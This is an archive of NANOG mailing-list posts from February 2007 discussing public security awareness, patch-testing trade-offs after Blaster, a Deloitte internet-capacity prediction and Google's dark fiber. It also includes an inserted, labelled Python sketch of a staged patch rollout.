Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Alexander Harrowell



3. Even if your computer is secure, miscreants depend on your trust. Be
suspicious of messages, files, software; even if it appears to come from a
person or company you trust.

Anti-spam, anti-spyware, anti-virus, anti-phishing tools can help.  But
don't assume because you are using them, you can click on everything
and still be safe.  The miscreants are always finding new ways around
them.

It may just be human nature, but people seem to engage in more risky
behavior when they believe they are protected.

4. If your computer is compromised, unplug it until you can get it
fixed.

 It's not going to fix itself, and ignoring the problem is just going
 to get worse.




5. Paying for AV software is not a solution, no matter how often it's been
on TV. (Norton - the antivirus software one finds on virus-infected
computers)


Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Adrian Chadd

On Sun, Feb 11, 2007, Alexander Harrowell wrote:

 5. Paying for AV software is not a solution, no matter how often it's been
 on TV. (Norton - the antivirus software one finds on virus-infected
 computers)

Don't forget the trojan payload lately that used a cracked copy of Kaspersky
AntiVirus to catch subsequent infecters. :)

http://sunbeltblog.blogspot.com/2006/12/hacked-version-of-dr-web-antivirus.html




Adrian



RE: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Sean Donelan


On Sat, 10 Feb 2007, Stasiniewicz, Adam wrote:

Sean makes a good point, but there is one small problem with his
suggestions.  He is preaching to the choir.


Just trying to get the choir to sing on key.  Of course, I know the choir
will probably spin off singing 18 different songs.

Local interest.

The next security incident, can the security experts in the US talk about 
what US readers can do.  Experts in Europe talk about what European readers can
do.  Experts in China, Australia, India, Brazil, Antarctica talk about 
what readers in those areas can do.


I have no idea when, where or what the next incident will be, but can 
guess it will involve the usual problems.


Turn on automatic update, turn off services you don't use, don't believe
everything you read on the net.





Any NANOGers going to 3GSM World Congress?

2007-02-11 Thread Alexander Harrowell

For the mobile maniacs among us..if you're coming to Barcelona, and flying
Iberia, BA or Lufthansa via Heathrow, beware that your aircraft will come in
at Terminal A but your checked baggage will be sent to Terminal B. Do NOT
pass through the doors to the baggage reclaim in Terminal A because you
won't be able to get back through, and will have to pass through the
security checkpoint in Terminal B Departures to recover your bags. This will
be problematic for non-Spanish speakers and impossible for anyone who has
thrown away their ticket stub.

That is, of course, if any NANOG users actually *have* checked baggage.


Re: Question about SLAs

2007-02-11 Thread Todd Vierling


On 2/9/07, Steve Rubin [EMAIL PROTECTED] wrote:

 Does that mean you can take them to small claims court if they don't pay
 you the agreed SLA credits?



Most contracts

 [in the U.S. today with largish to large corporations]

have an arbitration clause


...though they shouldn't.  Arbitration isn't, as far as I know, one of
the official branches of government.  I always find it rather contrary
to logic that a contract, which is governed by the U.S. court system,
can be written not to be covered by the U.S. court system.  What an
amazing loophole for corporate legal that is.

(ObExperience:  Every *forced* arbitration decision out of the 200+
I've researched has been in favor of the original contract writer --
the service provider and not its customer.  The only arbitration
settlements I've seen go the other way were only voluntarily moved to
arbitration; one pretty major such settlement was made into a movie
about a large energy company)

--
-- Todd Vierling [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]


Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Steven M. Bellovin

On Sat, 10 Feb 2007 23:36:32 -0600
Stasiniewicz, Adam [EMAIL PROTECTED] wrote:
 
 Another time I was doing some consulting work for a NPO.  I was going
 over the findings of my audit and I told the IT manager that all of
 his machines were missing patches.  His response: we only install
 service packs, individual patches take too much time to install and
 tend to break more stuff than they fix.  Ironically, a month later
 he calls me back asking for help because his network got infected with
 Blaster...

He was both right and wrong -- patches do break a lot of stuff.  He was
facing two problems: the probability of being off the air because of an
attack versus the probability of being off the air because of bad
interactions between patches and applications.  Which is a bigger risk?

It's not an easy question to answer.  One scenario that scares me is
what happens if the April Patch Tuesday takes out, say, TurboTax, just
as Americans are getting ready to file their tax returns.

There are no good answers to this question.  Of course, being an
academic I can view such problems as opportunities, and it is in fact
a major focus of my research.  Today, though, it's a serious issue for
system managers.


--Steve Bellovin, http://www.cs.columbia.edu/~smb


death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Paul Vixie

(i'm guessing kc will be on the phone soon, to get from them their data?)

...

A recent report from Deloitte said 2007 could be the year the internet
approaches capacity, with demand outstripping supply. It predicted bottlenecks
in some of the net's backbones as the amount of data overwhelms the size of
the pipes.

...

http://news.bbc.co.uk/2/hi/technology/6342063.stm


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Chris L. Morrow



On Sun, 11 Feb 2007, Paul Vixie wrote:


 (i'm guessing kc will be on the phone soon, to get from them their data?)

 ...

 A recent report from Deloitte said 2007 could be the year the internet
 approaches capacity, with demand outstripping supply. It predicted bottlenecks
 in some of the net's backbones as the amount of data overwhelms the size of
 the pipes.

because people can't get more pipe? perhaps next time the news folks could
ask someone who runs a network what the problems are that face network
operators? (or did I miss the hue and cry on nanog-l about full pipes and
no more fiber to push traffic over? wasn't there in fact a hue and cry
about a 1) fiber glut, 2) only 4% of all fiber actually lit?)

-Chris
still-waiting-for-the-rapture


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread brett watson



On Feb 11, 2007, at 10:58 AM, Chris L. Morrow wrote:


 perhaps next time the news folks could
ask someone who runs a network what the problems are that face network
operators?


they did ask one, you must have missed this from the article:

Verisign, the American firm which provides the backbone for much of  
the net, including domain names .com and .net,...


-b




Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Paul Vixie

-Chris, still-waiting-for-the-rapture, wrote as follows:

 (or did I miss the hue and cry on nanog-l about full pipes and no more fiber
 to push traffic over? wasn't there in fact a hue and cry about a 1) fiber
 glut, 2) only 4% of all fiber actually lit?)

:-).  however, you did seem to miss the hue and cry about how ALL YOUR BASE
ARE BELONG TO GOOGLE now.  a smattering of this can be found at:

* http://www.internetoutsider.com/2006/04/how_much_dark_f.html
* http://dondodge.typepad.com/the_next_big_thing/2005/11/google_data_cen.html

now as to whether this is true, or whether it's a prevent-defense meant to
strangle the redmond folks before the redmond folks know they needed fiber
or whether google actually needs the capacity, or whether it's possible to
lock up the market for more than couple of years, given that more capacity
can be laid in once all the LRU's are signed... who the heck knows or cares?

but hue there has been, and cry also, and measurement weenettes are likely
banging their foreheads against their powerbook screens while they read our
uninformed 4% estimates.


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Jim Mercer

On Sun, Feb 11, 2007 at 11:14:49AM -0700, brett watson wrote:
 On Feb 11, 2007, at 10:58 AM, Chris L. Morrow wrote:
  perhaps next time the news folks could
 ask someone who runs a network what the problems are that face network
 operators?
 
 they did ask one, you must have missed this from the article:
 
 Verisign, the American firm which provides the backbone for much of  
 the net, including domain names .com and .net,...

isn't this a little like saying we are running out of voice capacity on
the network because YellowPages can't find cheap paper to print their
directories?

surely they could have found a more relevant source.

-- 
[ Jim Mercer        jim@reptiles.org        +971 50 436-3874 ]
[  I want to live forever, or die trying.]


Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Gadi Evron

On Sat, 10 Feb 2007, Sean Donelan wrote:
 
 On Tue, 6 Feb 2007, Roy wrote:
  It's amazing how reporters have to butcher technology information to make it 
  understood by their editors
 
  http://www.cnn.com/2007/TECH/internet/02/06/internet.attacks.ap/index.html?eref=rss_topstories
 
 Do we keep missing opportunities?
 
 Yes, it was a minor incident, just like a minor earthquake, the hurricane 
 that doesn't hit, the fire that is extinguished. But it was also an 
 opportunity to get the message out to the public about the things they 
 can do to take control.
 
 We remind people what to do in a tornado, earthquake, flood, hurricane, 
 etc.  This on-going education does help; even though some people still
 drive their cars through moving water or go outside to watch the tornado.

Colin Powell mentioned at RSA in his extremely good, entertaining and
pointless talk something of relevance. During the cold war American kids
were trained to hide beneath their desktops in case of a nuclear
attack. Much good that would have done.

 Instead of pointing fingers at South Korea, China, etc, every country
 with compromised computers (all of them) are the problem.  The United 
 States may be slow as far as broadband, but it makes up for it in the 
 number of compromised computers.
 
 We may know the drill, but it doesn't hurt to repeat message every time
 we have the public's attention for 15 seconds.

And yet, can a non-trained user understand what awareness means?

 
 1. Turn on Automatic Update if your computer isn't managed by a full-time 
 IT group.
 
 Microsoft Windows, Apple MAC OS/X, and several versions of Linux
 have Automatic Update available.  Most vendors make security patches
 available to users whether or not the software is licensed or
 un-licensed.
 
 Zero day exploits may be sexy and get the press attention, but the
 long-term problem are the computers that never get patched.  The VML
 exploit on the football stadium websites was patched last month; but
 it's not how fast a patch is released, it's how fast people install it.

Amen. 0days have become something petrifying. At my talk at RSA on
the subject of 0days and ZERT I started by asking what a 0day
is. Any guesses as to how many answers I got?

One answer I did get was that we are all petrified as we can't do
anything about it (not true) and won't know about it.

I am of the strong belief one should take care of known vulnerabilities
first, then start worrying about 0days. That's one thing anyone can start
the process of doing (and for organizations, this can take years) which
will also result in a better infrastructure to contain and respond to 0day
attacks.

Still, how many users know how to turn on automatic updates? We are likely
to see them go to google, type in automatic updates and end up
downloading malware.

 2. Use a hardware firewall/router for your broadband connection and turn 
 on the software firewall on your computer in case you ever move your
 computer to a different network.
 
  Use Wireless security (WEP, WPA, VPN, SSL, etc) if using a WiFi access
  point, or turn off the radio on both your home gateway and computer
  if you are not using WiFi.

How??

This is where providers can chime in, and provide with pre-secured
hardware to any level which is above come and rape me.

 3. Even if your computer is secure, miscreants depend on your trust. Be 
 suspicious of messages, files, software; even if it appears to come from a 
 person or company you trust.

How do I determine what is suspicious? This is a message telling me my
mother is sick!

 Anti-spam, anti-spyware, anti-virus, anti-phishing tools can help.  But
 don't assume because you are using them, you can click on everything
 and still be safe.  The miscreants are always finding new ways around
 them.

This is too complicated. I don't understand. So you give me a solution,
use this and that tool, and then I need to be careful yet again?

 It may just be human nature, but people seem to engage in more risky
 behavior when they believe they are protected.

The 4-bit encryption issue. I am encrypted and thus protected.

I would argue email is simply not a secure medium by which to receive
files. Call and verify when in doubt.

If approached by phone, email or any other medium, verify the source
independently in an unrelated fashion to any instructions provided
in that approach, before trusting it.

 4. If your computer is compromised, unplug it until you can get it fixed.
 
  It's not going to fix itself, and ignoring the problem is just going
  to get worse.

A user won't unplug him or herself. An ISP might. Today the economy of
this changes enough for quite some ISPs to decide it is better to kick a
user than give him or her tech support. Enter walled garden.

Gadi.



RE: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Gadi Evron

On Sun, 11 Feb 2007, Sean Donelan wrote:
 
 On Sat, 10 Feb 2007, Stasiniewicz, Adam wrote:
  Sean makes a good point, but there is one small problem with his
  suggestions.  He is preaching to the choir.
 
 Just trying to get the choir to sing on key.  Of course, I know the choir
 will probably spin off singing 18 different songs.
 
 Local interest.
 
 The next security incident, can the security experts in the US talk about 
 what US readers can do.  Experts in Europe talk about what European readers can
 do.  Experts in China, Australia, India, Brazil, Antarctica talk about 
 what readers in those areas can do.
 
 I have no idea when, where or what the next incident will be, but can 
 guess it will involve the usual problems.
 
 Turn on automatic update, turn off services you don't use, don't believe
 everything you read on the net.

Preaching to the choir indeed, only the choir is not the users.

The Internet is not a secure place and we can force no one to secure their
computers. We can throw them off our networks if they don't, as they cost
us more than they pay.

Gadi.



Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Gadi Evron

On Sun, 11 Feb 2007, Paul Vixie wrote:
 
 (i'm guessing kc will be on the phone soon, to get from them their data?)
 

Any of us with any sense know the Internet could potentially die tomorrow
morning. Any of us with any sense know it could be done in any number of
ways, ranging from relatively few well aimed packets to a few thousand
bots if used correctly, if not a few hundred if used amazingly well.

Any of us with half a sense know that the Internet is not going to die
tomorrow and that if it does, something will replace or more likely
supplement it.

But run out of tubes and trucks? Come on! Traffic jams are solved by
bypasses and more lanes. :P

 ...
 
 A recent report from Deloitte said 2007 could be the year the internet
 approaches capacity, with demand outstripping supply. It predicted bottlenecks
 in some of the net's backbones as the amount of data overwhelms the size of
 the pipes.
 
 ...
 
 http://news.bbc.co.uk/2/hi/technology/6342063.stm
 



Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Steven M. Bellovin

On Sun, 11 Feb 2007 10:49:30 -0600
Dave Pooser [EMAIL PROTECTED] wrote:

 
  He was both right and wrong -- patches do break a lot of stuff.  He
  was facing two problems: the probability of being off the air
  because of an attack versus the probability of being off the air
  because of bad interactions between patches and applications.
  Which is a bigger risk?
 
 That's an argument for an organizational test environment and testing
 patches before deployment, no? Not an argument against patching. That
 said, I would LOVE to see MS ship a monthly/quarterly unified updater
 that's a one-step way to bring fresh systems up to date without
 slipstreaming the install CD. Then press a zillion of 'em and put
 them everywhere you can find an AOL CD, for all those folks on
 dial-up who see a 200MB download and curl up in the fetal position
 and whimper.
 

Surveys have shown an inverse correlation between the size of a company
and when it installed XP SP2.  

Yes, you're right; a good test environment is the right answer.  As I
think most of us on this list know, it's expensive, hard to do right,
and still doesn't catch everything.  If I recall correctly, the post I
was replying to said that it was a non-profit; reading between the
lines, it wasn't heavily staffed for IT, or they wouldn't have needed a
consultant to help clean up after Blaster.  And there's one more thing
-- at what point have you done enough testing, given how rapidly some
exploits are developed after the patch comes out?


--Steve Bellovin, http://www.cs.columbia.edu/~smb


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Gadi Evron

On Sun, 11 Feb 2007, Chris L. Morrow wrote:
 
 because people can't get more pipe? perhaps next time the news folks could
 ask someone who runs a network what the problems are that face network
 operators? (or did I miss the hue and cry on nanog-l about full pipes and
 no more fiber to push traffic over? wasn't there in fact a hue and cry
 about a 1) fiber glut, 2) only 4% of all fiber actually lit?)

No no... you miss the point. If all lanes are used for the same traffic,
no trucks can pass in the tubes! :)

 
 -Chris
 still-waiting-for-the-rapture
 



Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Geo.



:-).  however, you did seem to miss the hue and cry about how ALL YOUR BASE
ARE BELONG TO GOOGLE now.  a smattering of this can be found at:


Has anyone considered that perhaps google is not looking at beating 
Microsoft but instead at beating TIVO, ABC, CBS, Warner Cable, etc? You 
can't possibly believe that there is enough bandwidth to stream High Def 
video to everyone, that's just not going to happen any time soon.


However, as the file share networks have proven, it is possible to download 
that content en masse today with today's last mile. Download it over time to 
watch it when you want to, the internet version of TIVO. That's where I think 
Google is headed with the dark fiber and massive storage containers. The 
fiber lets them get content to local points across the internet, like a 
great big fileshare network except with google in control so they can 
promise media producers that the material will be downloaded with 
commercials in the downloads.


All you need is someone like Cisco to team with who can produce a network 
consumer DVD player capable of assuming the role of a physical tivo box, say 
something like the kiss technology DP-600 box (cisco bought kiss last year) 
that the MPAA loves so much (MPAA bought thousands of them for their own 
purposes) and presto things are suddenly taking a whole new shape and 
direction.


So now you get a choice, buy a new HD TV tuner or buy a new DVD player that 
does standard or HD tv even after the over the air broadcast change happens 
in the US.


All your base indeed.. no hue required.

George Roettger
Netlink Services




Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Chris L. Morrow



On Sun, 11 Feb 2007, brett watson wrote:


 they did ask one, you must have missed this from the article:

 Verisign, the American firm which provides the backbone for much of
 the net, including domain names .com and .net,...

I forgot that new IP over POS over DNS over IP over POS backbone...


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Paul Vixie

 Has anyone considered that perhaps google is not looking at beating
 Microsoft but instead at beating TIVO, ABC, CBS, Warner Cable, etc?

sure, but...

 You can't possibly believe that there is enough bandwidth to stream 
 HD video to everyone, that's just not going to happen any time soon.

...wouldn't there be, if interdomain multicast existed and had a billing
model that could lead to a compelling business model?  right now, to the
best of my knowledge, all large multicast flows are still intradomain.

so if tivo and the others wanted to deliver all that crap using IP, would
they do what broadcast.com did (lots of splitter/repeater stations), or
do what google is presumably doing (lots of fiber), or would they put
some capital and preorder into IDMR?

 All you need is someone like Cisco to team with who can produce a network
 consumer DVD player capable of assuming the role of a physical tivo box,
 say something like the kiss technology DP-600 box (cisco bought kiss last
 year) that the MPAA loves so much (MPAA bought thousands of them for their
 own purposes) and presto things are suddenly taking a whole new shape and
 direction.

yeah.  sadly, that seems like the inevitable direction for the market leaders
and disruptors.  but i still wonder if a dark horse like IDMR can still emerge
among the followers and incumbents (or the next-gen disruptors)?

 So now you get a choice, buy a new HD TV tuner or buy a new DVD player that
 does standard or HD tv even after the over the air broadcast change happens
 in the US.

at some point tivo will disable my fast-forward button and i'll give up 
network TV altogether.  irritatingly, hundreds of millions of others will
not.  but we digress.


Re: Every incident is an opportunity (was Re: Hackers hit key Internet

2007-02-11 Thread Paul Vixie

[EMAIL PROTECTED] (Sean Donelan) writes:

 ... don't believe everything you read on the net.

you had me right up until that last part, which is completely unreasonable.
-- 
Paul Vixie


RE: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)

2007-02-11 Thread Stasiniewicz, Adam

Yes, the place in question was very understaffed.  The long term
remediation plan I helped them on after the Blaster case was to deploy
SUS and acquire a volume license for an AV (they had very spotty and in
some sites nonexistent AV coverage on the client machines).  With the
pressure from upper management, I got the IT manager to do some basic
tests of patches (manual install on the computers in the IT office and
see if anything blew up) then push the patches via SUS.  

I have seen some fairly reasonable methodologies for deploying patches.
In this day, being behind with patches (especially with Microsoft
products) is like playing with fire.  (That is not to say that it is a
good idea to be behind on your *nix updates, they are just as vulnerable
to exploit if they are running old versions of internet accessible
apps.) Some of the strategies I have seen that work reasonably well at
mitigating the risk of damage caused by patches:

- Deploy patches to a small amount of computers (one or two per
department).  This way you get coverage of all the apps used.  Then
after a day or two of no complaints, push patches out to the rest of the
computers.
- Maintain a collection of computers running all of the critical apps
where you can test each patch on.
- Wait a few days before patching.  During this time monitor mailing
lists/blogs/news sites/etc for any reports of problems, if none exist,
patch.

It should also be noted that over the last few years Microsoft has got a
lot better at internally testing patches (remember the NT4 service
packs?).  So many times for my smaller and less staffed customers and
private individuals I advise them to configure for automatic updating.

Adam Stasiniewicz

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of
Steven M. Bellovin
Sent: Sunday, February 11, 2007 12:49 PM
To: Dave Pooser
Cc: nanog
Subject: Re: Every incident is an opportunity (was Re: Hackers hit key
Internet traffic computers)


On Sun, 11 Feb 2007 10:49:30 -0600
Dave Pooser [EMAIL PROTECTED] wrote:

 
  He was both right and wrong -- patches do break a lot of stuff.  He
  was facing two problems: the probability of being off the air
  because of an attack versus the probability of being off the air
  because of bad interactions between patches and applications.
  Which is a bigger risk?
 
 That's an argument for an organizational test environment and testing
 patches before deployment, no? Not an argument against patching. That
 said, I would LOVE to see MS ship a monthly/quarterly unified updater
 that's a one-step way to bring fresh systems up to date without
 slipstreaming the install CD. Then press a zillion of 'em and put
 them everywhere you can find an AOL CD, for all those folks on
 dial-up who see a 200MB download and curl up in the fetal position
 and whimper.
 

Surveys have shown an inverse correlation between the size of a company
and when it installed XP SP2.  

Yes, you're right; a good test environment is the right answer.  As I
think most of us on this list know, it's expensive, hard to do right,
and still doesn't catch everything.  If I recall correctly, the post I
was replying to said that it was a non-profit; reading between the
lines, it wasn't heavily staffed for IT, or they wouldn't have needed a
consultant to help clean up after Blaster.  And there's one more thing
-- at what point have you done enough testing, given how rapidly some
exploits are developed after the patch comes out?


--Steve Bellovin, http://www.cs.columbia.edu/~smb
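
Added example, not part of the thread: a sketch of the staged rollout Adam Stasiniewicz lists above (one or two pilot machines per department, then a soak period of a day or two before pushing to everyone else). The inventory, host names, application names and function names are all constructed for illustration; it also shows the case where two pilots per department do not cover every application in use.

```python
from dataclasses import dataclass
from datetime import date, timedelta


@dataclass(frozen=True)
class Machine:
    host: str
    dept: str
    apps: frozenset


# Constructed inventory (hypothetical hosts, departments and applications).
INVENTORY = [
    Machine("fin-01", "finance", frozenset({"office", "ledger"})),
    Machine("fin-02", "finance", frozenset({"office", "payroll"})),
    Machine("fin-03", "finance", frozenset({"office", "ledger", "payroll"})),
    Machine("fin-04", "finance", frozenset({"office"})),
    Machine("ops-01", "operations", frozenset({"office", "cad"})),
    Machine("ops-02", "operations", frozenset({"office", "dispatch"})),
    Machine("ops-03", "operations", frozenset({"scanner"})),
    Machine("it-01", "it", frozenset({"office", "admin-tools"})),
]


def pick_pilots(inventory, per_dept=2):
    """Choose at most per_dept pilot machines in each department.

    Greedy set cover: repeatedly take the machine that runs the most
    applications not yet exercised by an earlier pilot. Returns
    (pilots, uncovered) where uncovered maps a department to the
    applications no pilot in that department runs.
    """
    by_dept = {}
    for m in sorted(inventory, key=lambda m: m.host):
        by_dept.setdefault(m.dept, []).append(m)

    pilots, uncovered = [], {}
    for dept in sorted(by_dept):
        machines = by_dept[dept]
        remaining = set().union(*(m.apps for m in machines))
        chosen = []
        while remaining and len(chosen) < per_dept:
            candidates = [m for m in machines if m not in chosen]
            # max() keeps the first best candidate, so ties go to the
            # alphabetically first host and the result is deterministic.
            best = max(candidates, key=lambda m: len(m.apps & remaining))
            chosen.append(best)
            remaining -= best.apps
        pilots.extend(chosen)
        if remaining:
            uncovered[dept] = remaining
    return pilots, uncovered


def rollout_decision(pilots_patched_on, today, pilot_complaints,
                     external_reports=0, soak_days=2):
    """Decide what to do with the machines outside the pilot group.

    'halt'    - a pilot user complained, or problems with the patch were
                reported elsewhere (mailing lists, vendor notes).
    'hold'    - nothing bad yet, but the soak period has not elapsed.
    'promote' - soak period passed quietly; push to everyone else.
    """
    if pilot_complaints or external_reports:
        return "halt"
    if today - pilots_patched_on < timedelta(days=soak_days):
        return "hold"
    return "promote"


def remaining_hosts(inventory, pilots):
    """Hosts that receive the patch only after a 'promote' decision."""
    pilot_hosts = {m.host for m in pilots}
    return sorted(m.host for m in inventory if m.host not in pilot_hosts)


if __name__ == "__main__":
    pilots, uncovered = pick_pilots(INVENTORY)
    print("pilot group:", [m.host for m in pilots])
    print("apps no pilot exercises:", uncovered)
    print("second wave:", remaining_hosts(INVENTORY, pilots))
    patched = date(2007, 2, 13)
    for offset in range(3):
        day = patched + timedelta(days=offset)
        print(day, rollout_decision(patched, day, pilot_complaints=[]))
```

Any application reported as uncovered needs either a larger pilot group or a separate test machine before the second wave goes out.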


RE: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Joseph Jackson

I didn't know verisign was a transit provider.  Anyone use em?
 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On 
 Behalf Of brett watson
 Sent: Sunday, February 11, 2007 10:15 AM
 To: nanog@merit.edu
 Subject: Re: death of the net predicted by deloitte -- film at 11
 
 
 
 On Feb 11, 2007, at 10:58 AM, Chris L. Morrow wrote:
 
   perhaps next time the news folks could
  ask someone who runs a network what the problems are that face network
  operators?
 
 they did ask one, you must have missed this from the article:
 
 Verisign, the American firm which provides the backbone for much of  
 the net, including domain names .com and .net,...
 
 -b
 
 
 


RE: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Joseph Jackson

My CIO is convinced that Google is going to take over the internet and
everyone will pay google for access.  He also believes that google will
release their own protocol some sort of Google IP which everyone will
have to pay for also. 


 

 -Original Message-
 From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On 
 Behalf Of Paul Vixie
 Sent: Sunday, February 11, 2007 10:27 AM
 To: nanog@merit.edu
 Subject: Re: death of the net predicted by deloitte -- film at 11 
 
 
 -Chris, still-waiting-for-the-rapture, wrote as follows:
 
  (or did I miss the hue and cry on nanog-l about full pipes and no more fiber
  to push traffic over? wasn't there in fact a hue and cry about a 1) fiber
  glut, 2) only 4% of all fiber actually lit?)
 
 :-).  however, you did seem to miss the hue and cry about how ALL YOUR BASE
 ARE BELONG TO GOOGLE now.  a smattering of this can be found at:
 
 * http://www.internetoutsider.com/2006/04/how_much_dark_f.html
 * http://dondodge.typepad.com/the_next_big_thing/2005/11/google_data_cen.html
 
 now as to whether this is true, or whether it's a prevent-defense meant to
 strangle the redmond folks before the redmond folks know they needed fiber
 or whether google actually needs the capacity, or whether it's possible to
 lock up the market for more than couple of years, given that more capacity
 can be laid in once all the LRU's are signed... who the heck knows or cares?
 
 but hue there has been, and cry also, and measurement weenettes are likely
 banging their foreheads against their powerbook screens while they read our
 uninformed 4% estimates.
 


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Mark Newton

On Sun, Feb 11, 2007 at 02:39:04PM -0800, Joseph Jackson wrote:

  My CIO is convinced that Google is going to take over the internet and
  everyone will pay google for access.  He also believes that google will
  release their own protocol some sort of Google IP which everyone will
  have to pay for also. 

Sounds great.  We won't all have to move to IPv6 after all!

  - mark :-)

-- 
Mark Newton   Email:  [EMAIL PROTECTED] (W)
Network Engineer  Email:  [EMAIL PROTECTED]  (H)
Internode Systems Pty Ltd Desk:   +61-8-82282999
Network Man - Anagram of Mark Newton  Mobile: +61-416-202-223


Re: Every incident is an opportunity (was Re: Hackers hit key Internet

2007-02-11 Thread Steve Sobol

On 11 Feb 2007, Paul Vixie wrote:

 
 [EMAIL PROTECTED] (Sean Donelan) writes:
 
  ... don't believe everything you read on the net.
 
 you had me right up until that last part, which is completely unreasonable.

I think it's not only reasonable, but is the only sane way to approach 
content on the net. Why do you feel it's unreasonable? Or are you being 
sarcastic? (It's impossible to tell) 

-- 
Steve Sobol, Professional Geek ** Java/VB/VC/PHP/Perl ** Linux/*BSD/Windows
Victorville, California PGP:0xE3AE35ED

It's all fun and games until someone starts a bonfire in the living room.



RE: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread william(at)elan.net



On Sun, 11 Feb 2007, Joseph Jackson wrote:


My CIO is convinced that Google is going to take over the internet and
everyone will pay google for access.  He also believes that google will
release their own protocol some sort of Google IP which everyone will
have to pay for also.


You mean like one well known company that tries to make sure everyone
pays for most common programs everyone needs when they buy a computer?
(you know it did not used to be like that 10 years ago...)

As for google, I'd not expect them to charge but new protocol with
the following structure will be right up their alley:

- destination address -       (there is no need for source address
                               since everything comes from google)
- data you asked for -
- data you did not ask for -  (google advertisement space)


:)

--
William Leibzon
Elan Networks
[EMAIL PROTECTED]


Re: Every incident is an opportunity (was Re: Hackers hit key Internet

2007-02-11 Thread Paul Vixie

   ... don't believe everything you read on the net.
  
  you had me right up until that last part, which is completely unreasonable.
 
 I think it's not only reasonable, but is the only sane way to approach 
 content on the net. Why do you feel it's unreasonable? Or are you being 
 sarcastic? (It's impossible to tell) 

i mean it's never going to happen, and is therefore totally unrealistic, and
that any plan with that as a required element is doomed at the outset, and we
had better figure out alternative plans.

you might just as well ask for rivers to flow backwards, or dogs and cats to
live together in harmony, or an educated american electorate, as to ask that
folks stop believing everything they read on the net | see on tv | etc.

are we off-topic yet?


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread David W. Hankins

On Sun, Feb 11, 2007 at 11:14:49AM -0700, brett watson wrote:
 Verisign, the American firm which provides the backbone for much of  
 the net, including domain names .com and .net,...

IP over domain name registration?

-- 
David W. Hankins                    If you don't do it right the first time,
Software Engineer                   you'll just have to do it again.
Internet Systems Consortium, Inc.   -- Jack T. Hankins


Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Geo.




do what google is presumably doing (lots of fiber), or would they put
some capital and preorder into IDMR?


IDMR is great if you're a broadcaster or a backbone, but how does it help 
the last 2 miles, the phoneco ATM network or the ISP network where you have 
10k different users watching 10k different channels? I'm not sure if it 
would help with a multinode replication network like what google is probably 
up to either (which explains why they want dedicated bandwidth, internode 
replication solves the backup problems as well).


Also forgetting that bandwidth issue for a moment, where is the draw that 
makes IPTV better than cable or satellite?  I mean come on guys, if the 
world had started out with IPTV live broadcasts over the internet and then 
someone developed cable, satellite, or over the air broadcasting, any of 
those would have been considered an improvement. IPTV needs something the 
others don't have and a simple advantage is that of an archive instead of 
broadcast medium. The model has to be different from the broadcast model or 
it's never going to fly.


TIVO type setup with a massive archive of every show so you can not only 
watch this week's episode but you can tivo download any show from the last 6 
years worth of your favorite series is one heck of a draw over cable or 
satellite and might be enough to motivate the public to move to a different 
service. A better tivo than tivo. As for making money, just stick a 
commercial on the front of every download. How many movies are claimed 
downloaded on the fileshare networks every week?


Geo. 



Re: death of the net predicted by deloitte -- film at 11

2007-02-11 Thread Frank Coluccio

I believe that the element that has been missing in this discussion thus far has
been the source (content) players, and where they are hiding. CDNs, a la Akamai,
Limelight, etc., will take up some of the slack and mitigate much of the backbone
burden where legitimate ISPs are concerned, as will hierarchical caching for the
newbie carriers-that-came-to-be-called ISPs - i.e., the MSOs and Telcos. Playing
the Pareto, the higher the demand (95/5) for a title, the closer it will be
stored to the user community, and the longer the tail (5/95) of a title, the
farther its storage from the user community. My point is, CDNs and hierarchical
cache must be inserted into the calculus, because one, they are already being
used, and two, their use will only increase with time, fwiw.

Frank 

ps - I've had some issues with my email editor of late. If anyone notices any
artifacts or extraneous characters in the delivery of this message, kindly email
me off list and I shall be indebted to you, tia. 

On Sun Feb 11 19:22 , Geo.  sent:



 do what google is presumably doing (lots of fiber), or would they put
 some capital and preorder into IDMR?

IDMR is great if you're a broadcaster or a backbone, but how does it help 
the last 2 miles, the phoneco ATM network or the ISP network where you have 
10k different users watching 10k different channels? I'm not sure if it 
would help with a multinode replication network like what google is probably 
up to either (which explains why they want dedicated bandwidth, internode 
replication solves the backup problems as well).

Also forgetting that bandwidth issue for a moment, where is the draw that 
makes IPTV better than cable or satellite?  I mean come on guys, if the 
world had started out with IPTV live broadcasts over the internet and then 
someone developed cable, satellite, or over the air broadcasting, any of 
those would have been considered an improvement. IPTV needs something the 
others don't have and a simple advantage is that of an archive instead of 
broadcast medium. The model has to be different from the broadcast model or 
it's never going to fly.

TIVO type setup with a massive archive of every show so you can not only 
watch this week's episode but you can tivo download any show from the last 6 
years worth of your favorite series is one heck of a draw over cable or 
satellite and might be enough to motivate the public to move to a different 
service. A better tivo than tivo. As for making money, just stick a 
commercial on the front of every download. How many movies are claimed 
downloaded on the fileshare networks every week?

Geo. 





